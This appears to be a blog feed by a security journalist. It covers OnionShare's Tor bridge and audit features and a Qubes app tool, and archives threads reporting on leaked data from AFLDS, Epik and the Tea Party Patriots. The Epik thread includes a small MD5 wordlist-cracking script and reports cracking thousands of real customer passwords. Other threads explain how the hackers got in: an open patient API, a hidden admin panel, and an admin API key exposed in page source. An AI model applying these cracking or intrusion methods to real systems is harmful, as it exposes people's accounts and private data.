<p><img src="moat1.png" alt=""></p>
<p>When you click "Request a New Bridge", you must solve a CAPTCHA to get access to the bridge settings.</p>
<p><img src="moat2.png" alt=""></p>
<p>But if the ISP is already blocking access to the Tor network and to torproject.org, what stops them from blocking BridgeDB also? To prevent this from happening, OnionShare uses a tool called <a href="https://gitlab.torproject.org/legacy/trac/-/wikis/doc/meek/">meek</a> that uses a technique called <a href="https://www.bamsoftware.com/papers/fronting/">domain fronting</a> to disguise the request to BridgeDB as an innocuous request to a major CDN, the kind that you make thousands of times a day as you use the web. This prevents these countries from being able to block the BridgeDB request without blocking the whole CDN itself, which would break large portions of the internet for its users.</p>
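<p>Conceptually, a domain-fronted request looks something like the following sketch (the hostnames are placeholders, not Tor's real endpoints): the outer connection, and therefore the TLS SNI a censor can observe, targets the CDN, while the inner HTTP <code>Host</code> header names the censored service the CDN quietly routes to:</p>

```python
from urllib.request import Request

# Placeholder hostnames, for illustration only.
front_url = "https://cdn.example.com/moat/fetch"  # what the censor sees
real_host = "bridges.example.net"                 # where the CDN forwards

# The connection (and SNI) go to cdn.example.com; the Host header
# carries the real destination, invisible to a network observer
# because it travels inside the encrypted TLS tunnel.
req = Request(front_url, headers={"Host": real_host})
print(req.full_url)            # outer target: the CDN
print(req.get_header("Host"))  # inner target: the bridge service
```

Blocking this request means blocking <code>cdn.example.com</code> entirely, which is exactly the collateral damage the censor wants to avoid.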
<p>OnionShare has also added support for <a href="https://snowflake.torproject.org/">Snowflake bridges</a> which uses WebRTC (the technology that we all use for our all-too-frequent video conferences) to allow anyone to quickly and easily run a bridge.</p>
<p>If you want to help censored users connect to Tor, you can actually just turn on Snowflake in the sidebar of my blog. As long as this tab is open, your browser will be running a Snowflake bridge.</p>
<h1 id="summary-of-onionshare-2-4-s-security-audit">Summary of OnionShare 2.4's security audit</h1><h3 id="improper-input-sanitization-and-an-out-of-bounds-read-in-qt">Improper input sanitization and an out-of-bounds read in Qt</h3><p>If a user was running the graphical version of OnionShare and an attacker entered a malicious string containing HTML in the path of the URL, and the user running OnionShare opened the History pane (which is collapsed by default), this HTML would be rendered by Qt, the library that OnionShare uses for its GUI.</p>
<p>When the ROS pen testers discovered that they could use this to display arbitrary images in the History pane, they started attacking Qt's image rendering and <em>uncovered a vulnerability in Qt's image renderer</em>. When used in conjunction with this sanitization issue in OnionShare, an out-of-bounds read was possible, causing OnionShare to crash.</p>
<p>ROS responsibly disclosed this vulnerability to the upstream Qt project which has fixed the issues. We're really proud that our project helped make Qt more secure.</p>
<h3 id="receive-mode-s-request-limit-was-easily-dos-able">Receive mode's request limit was easily DoS-able</h3><p>Receive mode had a rate limit built in to try to prevent race conditions with folder creation during concurrent uploads. It turns out that it's pretty easy to force a denial-of-service attack by submitting the form more than 100 times per second, which would prevent authentic requests from being submitted. We solved this by using microseconds in the folder creation system, which now makes it impractical to hit the rate limit.</p>
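<p>The idea behind the fix can be sketched like this (a minimal illustration with a hypothetical name format, not OnionShare's actual code): naming each upload folder down to the microsecond makes collisions between concurrent uploads, and thus the rate limit, practically unreachable.</p>

```python
from datetime import datetime

def upload_folder_name(now=None):
    # One folder per upload, timestamped to the microsecond (%f), so
    # two uploads arriving within the same second no longer collide.
    now = now or datetime.now()
    return now.strftime("%Y%m%d-%H%M%S-%f")

print(upload_folder_name())  # e.g. 20220117-134502-123456
```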
<h3 id="chat-mode-issues">Chat mode issues</h3><p>ROS discovered that there were a variety of issues in Chat mode, most of which were closely related to one another, and so were fixed all at once. They were mostly impersonation attacks. These included:</p>
<ul>
<li>The ability to change your username to something almost identical to that of another user, like by having whitespace at the end of the username, or by using special characters</li>
<li>It was possible to join the chat but not emit the <code>join</code> event, which meant you were effectively invisible in the room, unbeknownst to the other parties, which might be a privacy issue</li>
<li>Similar to the above, it was possible to post messages to the chat room without technically being visible, or with another person's username, leading to confusion or impersonation</li>
<li>And again, similar to the above, it was possible to spoof the <code>leave</code> event, making people think you had left the chat room when in fact you were still able to read subsequent chat messages</li>
</ul>
<h3 id="minor-issues">Minor issues</h3><p>ROS also discovered a handful of minor issues, including:</p>
<ul>
<li>The Linux packaging using Snapcraft and Flatpak could be hardened to prevent read-only access to the user's home folder</li>
<li>The Content Security Policy header could be disabled but not configured</li>
</ul>
<p>It's important to keep in mind that because of how OnionShare is designed, all of the vulnerabilities discovered could only be exploited if the attacker had access to the OnionShare site. It would either need to be a publicly advertised OnionShare address, or the attacker would need to intercept or be directly sent an OnionShare address and private key.</p>
<p>I want to take the opportunity to thank Radically Open Security, as well as the Open Technology Fund, for conducting such a comprehensive audit. ROS is a talented and professional organization, and it was really easy to work with them to address these issues.</p>
Qube Apps: a Flatpak-based app store for each qube2021-11-01T00:00:00ZMicah Leeurn:uuid:c01d8ab7-f6b6-3e7c-8a5b-32e363d3a4a0<p>I really like <a href="https://www.qubes-os.org/">Qubes</a> but I haven't been using it a lot lately. I have a Qubes laptop that I use for specific high security tasks, but my daily driver the last few months has been Ubuntu or <a href="https://pop.system76.com/">Pop!_OS</a> (I really like the tiling windows and the design), and sometimes macOS. Qubes is great, but it can be cumbersome to use.</p>
<p>But then I did something silly. I downloaded documents from an anonymous person on the internet that I was interested in looking at. One of them was in a strange format I wasn't familiar with, but I found an open source tool that could load the document, so I installed that and then opened it... and then it immediately crashed. Was it just a glitch, or did I just get hacked? Ugh, this is why I should be using Qubes. In Qubes, I could do this in a disposable, networkless qube so that if it did try to hack me it wouldn't have access to any of my data, or even the internet.</p>
<p>Now that I'm back on Qubes, I decided to write a little utility called <a href="https://github.com/micahflee/qube-apps">Qube Apps</a> that helps make it a little less cumbersome. It's a simple graphical wrapper around <code>flatpak</code> that lets you install, run, and update apps inside a single qube, giving you easy access to everything available in the Linux app store <a href="https://flathub.org/home">Flathub</a>, and installing it all in your private storage so you don't need to constantly fiddle with your templates.</p>
<p>Here's how it works. Each qube is based on either a Fedora or Debian template. If you have a <code>work</code> qube that's based on <code>fedora-34</code> and you want to install Slack in it, you need to first install Slack in the <code>fedora-34</code> template, and then you'll be able to run it in <code>work</code>. But this means you'll also have Slack installed in every other qube that's based on <code>fedora-34</code>, and you might not want this. What if in addition to <a href="https://flathub.org/apps/details/com.slack.Slack">Slack</a>, you also want <a href="https://flathub.org/apps/details/com.discordapp.Discord">Discord</a>, <a href="https://flathub.org/apps/details/com.visualstudio.code">Visual Studio Code</a>, <a href="https://flathub.org/apps/details/org.signal.Signal">Signal Desktop</a>, and <a href="https://flathub.org/apps/details/com.spotify.Client">Spotify</a>? Should you install all of this in your template even if you only need these apps in a single qube?</p>
<p>The answer is to install all of these as Flatpak apps, passing <code>--user</code> when you run the <code>flatpak</code> commands. This runs without root and installs the software into your <code>~/.local/share/flatpak/</code> folder, which lives in your qube's private storage, so it will still be there the next time you reboot. This is also more secure than using software installed through traditional package managers like <code>dnf</code> or <code>apt</code>, because Flatpak apps all run in sandboxes.</p>
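<p>In raw command form, the per-user Flatpak workflow looks something like this (run inside the qube itself; Signal Desktop is just an example app, and check flathub.org for the current repo URL):</p>

```shell
# Add the Flathub remote for this user only (no root, no template).
flatpak remote-add --user --if-not-exists flathub \
    https://dl.flathub.org/repo/flathub.flatpakrepo

# Install into ~/.local/share/flatpak/, i.e. the qube's private
# storage, so the app survives reboots.
flatpak install --user -y flathub org.signal.Signal

# Run it, and later update everything installed this way.
flatpak run org.signal.Signal
flatpak update --user -y
```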
<p>Let me show you an example. I already have Qube Apps installed in my <code>fedora-34</code> template, so let's make a new qube to test with:</p>
<p><img src="qube-apps1.png" alt=""></p>
<p>After creating it, I open its Qube Settings, switch to the Applications tab, and add Qube Apps to the selected applications. Then I run Qube Apps in the <code>my-new-qube</code> qube. It looks like this, because I don't have any apps from Flathub installed yet.</p>
<p><img src="qube-apps2.png" alt=""></p>
<p>When I click "Install New App" I get a simple interface to search for apps. Let's search for Signal Desktop.</p>
<p><img src="qube-apps3.png" alt=""></p>
<p>This search basically just runs <code>flatpak search signal</code> for you and displays the results. There are several results on Flathub that mention "signal" in their name or description, but the Signal Desktop one looks like it's probably the right one. If you click the Info button it will load the specific app that it's referring to on Flathub, in this case <a href="https://flathub.org/apps/details/org.signal.Signal">Signal Desktop</a>.</p>
<p>Now, I click the Install button. This opens an interactive <code>xterm</code> that asks if I'm sure I want to install it, and shows me installation progress.</p>
<p><img src="qube-apps4.png" alt=""></p>
<p>Eek, it says: "Warning: Not enough disk space to complete this operation". This is a common problem that you will almost certainly run into if you're installing Flatpak apps in your qubes, but it's easy to fix. Just give the qube more disk space. I'm going to change the private storage for <code>my-new-qube</code> from 2 GB to 10 GB.</p>
<p><img src="qube-apps5.png" alt=""></p>
<p>Now that I have 10 GB of private storage, Signal Desktop finishes installing without a problem. I can run it or delete it, and if I click Update Apps it will update all of the Flatpak apps I have installed to the latest versions.</p>
<p><img src="qube-apps6.png" alt=""></p>
<p>Now I'm going to install Slack, Discord, Spotify, and Visual Studio Code as well. Easy peasy.</p>
<p><img src="qube-apps7.png" alt=""></p>
<p>Hopefully Qube Apps will help you avoid installing tons of software in your templates, and help you run more of your apps in an inception of sandboxes.</p>
<p>Qube Apps is licensed GPLv3 and the code is <a href="https://github.com/micahflee/qube-apps">on github</a>. The whole thing is a python script that's less than 400 lines of code. I programmed it last night. See the <a href="https://github.com/micahflee/qube-apps/blob/main/README.md">README.md</a> for instructions on building it and installing it in your template.</p>
Twitter Thread: Healthcare network led by Simone Gold and America's Frontline Doctors making millions off hydroxychloroquine and ivermectin2021-09-28T00:00:00ZMicah Leeurn:uuid:3c48226c-b413-3ee3-801f-f4888e66172a<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1442969576719847425">https://twitter.com/micahflee/status/1442969576719847425</a></p>
<hr>
<p>A network of right-wing healthcare providers, led by @drsimonegold and America's Frontline Doctors, is making millions of dollars off of hydroxychloroquine and ivermectin, data provided to The Intercept by an anonymous hacker reveals <a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/</a></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 2,553 Retweets, 4,284 Likes</em></p>
<hr>
<p>AFLDS, founded to promote pro-Trump doctors, has been spreading Covid misinformation since 2020. It refers its followers to its telemedicine partner SpeakWithAnMD where they pay $90 for a phone consultation</p>
<p><img src="image1a.jpg" alt="">
<img src="image1b.jpg" alt="">
<img src="image1c.jpg" alt="">
<img src="image1d.jpg" alt=""></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 216 Retweets, 663 Likes</em></p>
<hr>
<p>An "AFLDS-trained" physician calls the patient and then prescribes them hydroxychloroquine, ivermectin, or similar drugs. The drugs are then filled by the online pharmacy @Ravkoo3, which forwards the prescription to a local pharmacy to mail to the patient</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 140 Retweets, 511 Likes</em></p>
<hr>
<p>That is, assuming patients get a phone consultation at all. Many customers complained that they paid the $90 and never got a call back <a href="https://time.com/6092368/americas-frontline-doctors-covid-19-misinformation/">https://time.com/6092368/americas-frontline-doctors-covid-19-misinformation/</a></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 159 Retweets, 558 Likes</em></p>
<hr>
<p>A hacker sent me 281k patient records from Cadence Health (provides SpeakWithAnMD's tech platform) from July 16 to Sept 12.</p>
<p>72k of the AFLDS patients had consultations, so they must have paid the $90, sometimes more than once.</p>
<p>That's $6,700,000 for consultations alone!</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 158 Retweets, 583 Likes</em></p>
<hr>
<p>The hacker also sent me 340k prescription records hacked from Ravkoo, from Nov 2020 to Sept 11, 2021. The VAST majority of them are for bogus Covid drugs pushed by AFLDS. In fact, <strong>only 13%</strong> of the Rx's are for other drugs. According to pricing data, these sold for $8.5 million</p>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 155 Retweets, 469 Likes</em></p>
<hr>
<p>@drsimonegold refers to Covid-19 vaccines as "experimental biological agents", argues that Covid-19 isn't very deadly (it's killed 690k Americans so far), and that the vaccine is more dangerous than the virus itself</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 87 Retweets, 401 Likes</em></p>
<hr>
<p>"Misinformation can be really powerful to swindle people into buying products," @KolinaKoltai, who studies vaccine misinformation at @uwcip, says. "America’s Frontline Doctors are able to scale this up massively."</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 94 Retweets, 406 Likes</em></p>
<hr>
<p>Cadence Health's CEO, Roque Espinal, says he had no idea. After we spoke yesterday, he terminated service with SpeakWithAnMD, and the telehealth platform is currently down.</p>
<p>"I don’t want to be associated with any crap like that. None of that quackery that’s going on," he said</p>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 114 Retweets, 505 Likes</em></p>
<hr>
<p>Ravkoo's CEO, Alpesh Patel, claims that they dropped AFLDS in late August because "the volume over there went up crazy, and we didn’t feel comfortable. And we don’t have that much capacity to fill that many prescriptions."</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 66 Retweets, 364 Likes</em></p>
<hr>
<p>Yesterday, after reaching out to the companies, SpeakWithAnMD and AFLDS had an emergency Zoom meeting full of 16 lawyers, according to Espinal. In the meeting, he told them he was terminating service, and then left</p>
<p><img src="image5.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 71 Retweets, 395 Likes</em></p>
<hr>
<p>And needless to say, the drugs AFLDS pushes are ineffective at preventing or treating Covid. If you don't want to get sick or die, get fully vaccinated and wear a mask when indoors in public</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">You are not a horse. You are not a cow. Seriously, y'all. Stop it. <a href="https://t.co/TWb75xYEY4">https://t.co/TWb75xYEY4</a></p>— U.S. FDA (@US_FDA) <a href="https://twitter.com/US_FDA/status/1429050070243192839?ref_src=twsrc%5Etfw">August 21, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 89 Retweets, 468 Likes</em></p>
<hr>
<p>AFLDS spreads Covid lies and dupes people into forking over 💵💵💵 using @drsimonegold's 340k followers on twitter, 112k on facebook, 184k on telegram, among other places.</p>
<p>Anti-vax plugs for AFLDS also show up in religious email newsletters, like this one</p>
<p><img src="image6.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 91 Retweets, 376 Likes</em></p>
<hr>
<p>People in ALL 50 states and DC sought quack medicine from AFLDS. 8.6k in California, 8k in Florida, and 7.4k in Texas. Over 1k people in 21 states. Here's an interactive map of cities that patients live in, for cities with at least 10 patients <a href="https://api.mapbox.com/styles/v1/micahflee/cktt2k7972k3r18mrhqdz9ji8.html?title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw&zoomwheel=true&fresh=true#4.14/34.59/-97.68/0/12">https://api.mapbox.com/styles/v1/micahflee/cktt2k7972k3r18mrhqdz9ji8.html?title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw&zoomwheel=true&fresh=true#4.14/34.59/-97.68/0/12</a></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 69 Retweets, 361 Likes</em></p>
<hr>
<p>The hacker says Cadence and Ravkoo were "hilariously easy" to hack.</p>
<p>Any user could ask Cadence's API for any patient data, and it gave it. The hacker simply asked for all the data.</p>
<p>Ravkoo's site had "a hidden admin panel that every user can log in to and view all the data"</p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 76 Retweets, 406 Likes</em></p>
<hr>
<p>Read the article for more details on the people who figured out how to make massive amounts of 💵💵💵 off the Covid-19 pandemic <a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/</a></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 121 Retweets, 392 Likes</em></p>
Goodbye, passwords in OnionShare2021-09-26T00:00:00ZMicah Leeurn:uuid:f9b46d62-2eca-3a7c-8e95-9ca2879253ea<p>I'm excited to announce that OnionShare 2.4 is now out and the major change in this version is that we've completely gotten rid of passwords! Private OnionShare services are now protected using private keys (aka <a href="https://community.torproject.org/onion-services/advanced/client-auth/">client authentication</a>) on the Tor layer instead of basic authentication on the HTTP layer. Check out the new version at <a href="https://onionshare.org">onionshare.org</a>!</p>
<p>Before today, OnionShare web addresses looked something like this:</p>
<pre><code>http://onionshare:constrict-purity@by4im3ir5nsvygprmjq74xwplrkdgt44qmeapxawwikxacmr3dqzyjad.onion
</code></pre>
<p>The first part, <code>onionshare:constrict-purity</code>, is an HTTP basic authentication username (always 'onionshare') and a random password. If you loaded that address in Tor Browser without the username and password part, it would prompt you to log in. If you didn't have the password and guessed wrong enough times, OnionShare would detect a potential attack and shut down the service.</p>
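<p>For the curious, Python's standard library will pull that address apart for you, which makes the structure clear (a quick illustration using the example address above):</p>

```python
from urllib.parse import urlsplit

# The old-style OnionShare address from above, with HTTP basic auth
# credentials embedded in the URL's userinfo section.
url = ("http://onionshare:constrict-purity@"
       "by4im3ir5nsvygprmjq74xwplrkdgt44qmeapxawwikxacmr3dqzyjad.onion")

parts = urlsplit(url)
print(parts.username)  # onionshare
print(parts.password)  # constrict-purity
print(parts.hostname)  # the bare .onion address
```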
<p>Today though, the passwords are gone! OnionShare 2.4 addresses look something like this:</p>
<pre><code>http://oy5oaslxxzwib7fsjaiz5mjeyg3ziwdmiyeotpjw6etxi722pn7pqsyd.onion
</code></pre>
<p>And the private keys look something like this:</p>
<pre><code>K3N3N3U3BURJW46HZEZV2LZHBPKEFAGVN6DPC7TY6FHWXT7RLRAQ
</code></pre>
<p>When you start an OnionShare service you get both, and you have to give both to the people who want to use your service. For example, let's say you want to send a super secret Nintendo ROM to your friend. You open OnionShare, drag the file in, and start the server.</p>
<p><img src="qbert1.png" alt=""></p>
<p>You open up an encrypted messaging app like Signal and then send <em>both</em> the OnionShare address and the private key. When your friend opens Tor Browser and pastes the address, Tor itself will pop up a little window asking for the private key.</p>
<p><img src="qbert2.png" alt=""></p>
<p>If they don't have it then it's simply impossible to connect.</p>
<p><img src="qbert3.png" alt=""></p>
<p>Once your friend copies and pastes the correct private key, they can access the onion site like normal and download the secret Nintendo ROM.</p>
<p><img src="qbert4.png" alt=""></p>
<p>The command line version, of course, works the same way. Let's say you want to set up a secret chat room. You can do that like this (in this case, running the command line version from the <a href="https://snapcraft.io/onionshare">snap package</a>):</p>
<pre><code>onionshare.cli --chat --title "retro gamerz only"
</code></pre>
<p><img src="qbert5.png" alt="">
<img src="qbert6.png" alt=""></p>
<p>If you want to run a <a href="https://docs.onionshare.org/2.4/en/advanced.html#turn-off-private-key">public OnionShare service</a> that anyone can access and doesn't have a secret key, like if you're setting up an anonymous dropbox, then just check the "This is a public OnionShare service (disables private key)" box before starting the server, or use the <code>--public</code> flag on the command line.</p>
<h1>Twitter Thread: Epik's utter lack of security &amp; terrible decisions boggle my mind</h1><p><em>2021-09-24, by Micah Lee</em></p>
<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1441554221183033346">https://twitter.com/micahflee/status/1441554221183033346</a></p>
<hr>
<p>Epik's utter lack of security &amp; terrible decisions boggle my mind. They logged plaintext passwords for login failures, and MD5(password) on success.</p>
<p>I tried cracking all MD5s using a wordlist of the plaintexts...</p>
<p>Now I have 11,000 actual passwords used by Epik customers #EpikFail</p>
<p><em>Posted 5:04 PM · Sep 24, 2021, 218 Retweets, 1,132 Likes</em></p>
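<p>For anyone wondering what "cracking with a wordlist" means in practice: unsalted MD5 can be attacked by hashing every candidate plaintext and looking it up in the dump. A toy sketch in Python; the hashes and wordlist here are made-up stand-ins, not real Epik data:</p>

```python
import hashlib

# Toy dictionary attack on unsalted MD5: hash each candidate plaintext and
# look it up in the set of leaked hashes. These hashes and this wordlist
# are made-up stand-ins, NOT real Epik data.
leaked_hashes = {
    "5f4dcc3b5aa765d61d8327deb882cf99",  # md5("password")
    "e10adc3949ba59abbe56e057f20f883e",  # md5("123456")
}
wordlist = ["password", "letmein", "123456"]

cracked = [w for w in wordlist if hashlib.md5(w.encode()).hexdigest() in leaked_hashes]
print(cracked)  # ['password', '123456']
```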
<hr>
<p>Importing them all into a database so I can see what the most popular passwords are among these 12k cracked ones...</p>
<p>(Note that the updated rows number could be misleading; it could be the same user logging on many times, I'm pretty sure.)</p>
<video src="1442318692272857093.mp4" controls width="640" height="360">Your browser does not support the video tag.</video><p><em>Posted 7:42 PM · Sep 26, 2021, 4 Retweets, 49 Likes</em></p>
<hr>
<p>The most popular passwords out of the 12k that I cracked</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 9:00 PM · Sep 26, 2021, 14 Retweets, 45 Likes</em></p>
<h1>Twitter Thread: 327GB of membership, donation, and petition signature records from the Tea Party Patriots</h1><p><em>2021-08-05, by Micah Lee</em></p>
<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1423331060465631236">https://twitter.com/micahflee/status/1423331060465631236</a></p>
<hr>
<p>Remember the Tea Party movement? Someone hacked their biggest group, @TPPatriots, and sent me 327gb of membership, donation, and petition signature records, including phone numbers, addresses, detailed activity history, and password hashes <a href="https://theintercept.com/2021/08/05/tea-party-patriots-hacked-billionaire-donors/">https://theintercept.com/2021/08/05/tea-party-patriots-hacked-billionaire-donors/</a></p>
<p><em>Posted 10:12 AM · Aug 5, 2021, 534 Retweets, 1,242 Likes</em></p>
<hr>
<p>TPP was founded in 2009 basically to protest Obama, Obamacare, and big government.</p>
<p>They were involved in Trump's "March to Save America" rally before the Jan 6 attack on the Capitol, and they spread COVID-19 misinformation early in the pandemic.</p>
<p><em>Posted 10:13 AM · Aug 5, 2021, 65 Retweets, 232 Likes</em></p>
<hr>
<p>Turns out, a few super rich donors account for most of the TPP non-profit's donations for multiple years.</p>
<p>In 2019 the non-profit got $1.2M in revenue. One donor was Texas billionaire Christopher Goldsbury, who on September 11, 2019 wired $1,000,000.</p>
<p><em>Posted 10:14 AM · Aug 5, 2021, 94 Retweets, 246 Likes</em></p>
<hr>
<p>In 2015 the non-profit got $106k in revenue, which hacked data shows came from only 2 donors.</p>
<p>$100,000 of that came from now-deceased California real-estate billionaire Sanford Diller, who donated a total of $400k to TPP's organizations.</p>
<p><em>Posted 10:15 AM · Aug 5, 2021, 49 Retweets, 159 Likes</em></p>
<hr>
<p>Interesting note about Sanford Diller:</p>
<p>He was also allegedly involved in an illegal scheme to trade millions of dollars in political donations in exchange for a pardon from Donald Trump for a friend of his <a href="https://abcnews.go.com/Politics/billionaire-pardon-effort-pledged-massive-donation-trump-sources/story?id=74656249">https://abcnews.go.com/Politics/billionaire-pardon-effort-pledged-massive-donation-trump-sources/story?id=74656249</a></p>
<p><em>Posted 10:15 AM · Aug 5, 2021, 75 Retweets, 209 Likes</em></p>
<hr>
<p>Another major donor is David Gore (an Oregon libertarian whose family owns the Gore-Tex fabric company), who stays out of the public light. Between 2018 and 2021, he's given:</p>
<ul>
<li>$50,000 to TPP Action, 501c4</li>
<li>$275,000 to TPP's super PAC</li>
<li>$124,000 to TPP Foundation, 501c3</li>
</ul>
<p><em>Posted 10:16 AM · Aug 5, 2021, 77 Retweets, 163 Likes</em></p>
<hr>
<p>TPP frequently claims to have "over 3 million" supporters, but this doesn't seem to be even close to true.</p>
<p>The hacked data (which could be incomplete) shows the real number is closer to 500k supporters, and only 144k of those are listed as "active"</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 10:18 AM · Aug 5, 2021, 68 Retweets, 178 Likes</em></p>
<hr>
<p>Because the data has home addresses, we could map cities with active users. Houston has the most with 984, followed by San Antonio, Las Vegas, then Phoenix.
Are there Tea Party people in your area?</p>
<p>(This map shows cities with at least 10 users, not home addresses.)</p>
<p><a href="https://api.mapbox.com/styles/v1/micahflee/ckrpgf4g502wd18pldmbvkpwg.html?fresh=true&title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw#4.07/38.67/-96.61">https://api.mapbox.com/styles/v1/micahflee/ckrpgf4g502wd18pldmbvkpwg.html?fresh=true&title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw#4.07/38.67/-96.61</a></p>
<p><em>Posted 10:20 AM · Aug 5, 2021, 74 Retweets, 174 Likes</em></p>
<hr>
<p>TPP is a conservative activist group. Back in mid-2015 to mid-2017 they frequently had petitions that got >20k signatures with names like:</p>
<ul>
<li>No Funding for Illegals</li>
<li>Save Our Constitution</li>
<li>Support Senator Jeff Sessions</li>
<li>Trump Won, Get Over It</li>
</ul>
<p><em>Posted 10:22 AM · Aug 5, 2021, 33 Retweets, 123 Likes</em></p>
<hr>
<p>But their activism division has really waned. There have only been 3 petitions with more than 8k signatures since then.</p>
<p>Their latest "Stop Critical Race Theory" petition only got 34 signatures in its first 2 weeks.</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 10:22 AM · Aug 5, 2021, 34 Retweets, 124 Likes</em></p>
<hr>
<p>Their most popular petition of all time, "Make Adam Schiff Resign", got 70k signatures.</p>
<p>This was during Trump's first impeachment inquiry. Schiff was a lead investigator into allegations that Trump withheld funds from Ukraine in exchange for investigations into the Bidens.</p>
<p><em>Posted 10:23 AM · Aug 5, 2021, 28 Retweets, 108 Likes</em></p>
<hr>
<p>A quick note about the password hashes in the hacked data:</p>
<p>The data has hashes for 13,000 users, and they're all hashed using salted MD5. MD5 is totally broken, so it's likely most of the original passwords could be recovered with normal GPUs and not too much time.</p>
<p><em>Posted 10:25 AM · Aug 5, 2021, 22 Retweets, 104 Likes</em></p>
<hr>
<p>So, why hack Tea Party Patriots? The hacker, who identifies with Anonymous, says it's because TPP was responsible for a lot of early COVID-19 misinformation, promoting hydroxychloroquine as a cure (it's not)</p>
<p><img src="image3a.png" alt="">
<img src="image3b.png" alt=""></p>
<p><em>Posted 10:29 AM · Aug 5, 2021, 63 Retweets, 177 Likes</em></p>
<hr>
<p>It turns out, if you viewed the source of any of TPP's petitions there was an 💫ADMINISTRATOR💫 API key. This "Wear Red on Trump's Birthday" petition is the one the hacker looked at to find this API key</p>
<p><img src="image4a.jpg" alt="">
<img src="image4b.jpg" alt=""></p>
<p><em>Posted 10:34 AM · Aug 5, 2021, 49 Retweets, 176 Likes</em></p>
<hr>
<p>Using this API key, they could access ALL OF TPP'S DATA. So they did.</p>
<p>They made over 800,000 API requests and downloaded details of ~800 local chapters and all their members, all the petitions and everyone who signed or donated.</p>
<p>Each of these users is full of detailed info.</p>
<p><em>Posted 10:34 AM · Aug 5, 2021, 36 Retweets, 148 Likes</em></p>
<hr>
<p>It turns out with this administrator API key it's not only possible to download all their data, but also to change it. For a few weeks in July, ALL of TPP's petitions were renamed to "Stop the Computer Fraud and Abuse Act"</p>
<p><img src="image5.jpg" alt=""></p>
<p><em>Posted 10:35 AM · Aug 5, 2021, 39 Retweets, 171 Likes</em></p>
<h1>Twitter Thread: Glenn Greenwald supporting the American fascist movement dressed up as "media criticism"</h1><p><em>2021-05-13, by Micah Lee</em></p>
<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1392889268918538243">https://twitter.com/micahflee/status/1392889268918538243</a></p>
<hr>
<p>Glenn's only real journalism since Snowden was the Lava Jato Brazil corruption stories, which I helped make possible for him. Everything else has been supporting the American fascist movement dressed up as "media criticism"</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The Intercept took this person trained to do computer work and now lets him pretend to be a "journalist." He's the one who -- like the FBI/NSA -- is digging through the personal data of ordinary Gab users to dox them. Read his exchange with a real journalist asking him about it: <a href="https://t.co/v6j4SRpawk">https://t.co/v6j4SRpawk</a></p>— Glenn Greenwald (@ggreenwald) <a href="https://twitter.com/ggreenwald/status/1392638621077938179?ref_src=twsrc%5Etfw">May 13, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 10:07 AM · May 13, 2021, 615 Retweets, 4,282 Likes</em></p>
<hr>
<p>On another note, I recently learned that my reporting on Zoom lying about encryption, which triggered an FTC investigation and caused Zoom to add <em>actual</em> E2EE, is now required reading at UC Berkeley <a href="https://theintercept.com/2020/03/31/zoom-meeting-encryption/">https://theintercept.com/2020/03/31/zoom-meeting-encryption/</a></p>
<p><em>Posted 10:07 AM · May 13, 2021, 51 Retweets, 642 Likes</em></p>
<hr>
